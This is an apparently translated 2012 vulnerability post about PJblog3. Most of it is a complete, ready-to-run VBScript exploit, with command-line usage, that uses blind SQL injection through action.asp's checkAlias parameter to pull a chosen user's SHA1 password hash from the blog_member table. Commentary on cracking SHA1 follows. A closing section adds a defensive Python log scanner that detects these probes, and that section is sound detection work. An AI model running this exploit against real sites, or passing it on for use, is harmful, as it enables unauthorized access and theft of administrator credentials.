PJblog3 vulnerability description and exploit - vulnerability warning - the black bar safety net

ID MYHACK58:62201235410
Type myhack58
Reporter 佚名
Modified 2012-11-03T00:00:00


I really cannot understand why such a vulnerability has existed for so long without the vendor fixing it. What is more worrying is that registered members can inject directly.

The tool is written in VBS; the code is as follows:


If WScript.Arguments.Count <> 2 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs <forum URL to check> <user name to check>"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
    WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl, "\", "/")
If Right(attackUrl, 1) <> "/" Then
    attackUrl = attackUrl & "/"
End If

' Hex alphabet of the SHA1 hash; the trailing "J" is a sentinel that sorts above "F"
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

' Boolean check: a true condition must succeed and a false one must fail
If IsSuccess(strHoleUrl & "or""1""=""1") And Not IsSuccess(strHoleUrl & "and""1""=""2") Then
    WScript.Echo "Congratulations! The vulnerability is present"
Else
    WScript.Echo "No vulnerability detected"
    WScript.Quit
End If

' Recover the 40 hex characters of the hash one character at a time
For n = 1 To 40
    For i = 1 To 17
        strInject = strHoleUrl & " or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1"
        If Not IsSuccess(strInject) Then
            strResult = strResult & Mid(SHA1Charset, i - 1, 1)
            Exit For
        End If
        strPrint = Chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
        WScript.StdOut.Write strPrint
    Next
Next

WScript.Echo Chr(13) & Chr(10) & "Done!"

Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

' Convert the raw response bytes into a VBS string
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

' The response contains "check_error" when the injected condition is true
Function IsSuccess(PostUrl)
    strData = PostData(PostUrl)
    'WScript.Echo strData
    If InStr(strData, "check_error") > 0 Then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
    'WScript.Sleep 500 'let the system rest
End Function

Usage: at the cmd prompt, enter "Cscript 1.vbs <blog URL to check> <admin user name to check>" (without the double quotation marks).

This yields the administrator's password as a SHA1 hash. It looks hard to crack at present: it can only be brute-forced, and there is no telling how long that would take. The online cracking services handle MD5, which is why many sites are switching to SHA1, and PJblog is no exception; over time, though, online SHA1 cracking should also become more common.
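As an added example, not part of the original post: detection logic, in Python, that scans constructed IIS-style log lines for checkAlias requests whose cname parameter carries SQL, and flags clients that issue repeated probes, which is the pattern the tool above leaves in a web server log. The log field layout, the signature regex and the probe threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed IIS-style log lines (date time client-ip method uri-stem uri-query status);
# the 198.51.100.9 requests mirror the probe shape of the VBS tool described above.
SAMPLE_LOG = """\
2012-11-03 10:00:01 203.0.113.7 GET /action.asp action=checkAlias&cname=alice 200
2012-11-03 10:00:05 198.51.100.9 GET /action.asp action=checkAlias&cname=0kee%22+or%221%22%3D%221 200
2012-11-03 10:00:06 198.51.100.9 GET /action.asp action=checkAlias&cname=0kee%22+and%221%22%3D%222 200
2012-11-03 10:00:07 198.51.100.9 GET /action.asp action=checkAlias&cname=0kee%22+or+0%3C%28Select+Count%28*%29+From+blog_member+Where+mem_name%3D%27admin%27+And+mem_password%3E%3D%270%27%29+And%221%22%3D%221 200
2012-11-03 10:00:08 198.51.100.9 GET /action.asp action=checkAlias&cname=0kee%22+or+0%3C%28Select+Count%28*%29+From+blog_member+Where+mem_name%3D%27admin%27+And+mem_password%3E%3D%271%27%29+And%221%22%3D%221 200
2012-11-03 10:00:09 203.0.113.7 GET /index.asp - 200
"""

# Assumed signature: a quote closing the literal followed by a boolean operator, or the
# table/column names the probes reference.  Tune it for your own schema.
INJECT_RE = re.compile(r'"\s*(?:or|and)\b|select\s+count|blog_member|mem_password', re.I)

def parse_line(line):
    """Split one log line into its fields; the query stays URL-encoded for parse_qs."""
    date, time, ip, method, stem, query, status = line.split()
    return {"ip": ip, "method": method, "stem": stem, "query": query, "status": status}

def is_checkalias_injection(rec):
    """True when the request hits action.asp?action=checkAlias with SQL inside cname."""
    if rec["stem"].lower() != "/action.asp" or rec["query"] == "-":
        return False
    params = parse_qs(rec["query"], keep_blank_values=True)  # also URL-decodes values
    if params.get("action", [""])[0] != "checkAlias":
        return False
    cname = params.get("cname", [""])[0]
    return INJECT_RE.search(cname) is not None

def detect(log_text, probe_threshold=3):
    """Return (flagged lines, client IPs with >= probe_threshold injected probes).
    Blind extraction needs many requests, so the per-client count is the stronger signal."""
    flagged, per_ip = [], Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_checkalias_injection(rec):
            flagged.append(line)
            per_ip[rec["ip"]] += 1
    suspects = sorted(ip for ip, n in per_ip.items() if n >= probe_threshold)
    return flagged, suspects

if __name__ == "__main__":
    lines, ips = detect(SAMPLE_LOG)
    print(f"{len(lines)} injected checkAlias requests; suspect clients: {ips}")
```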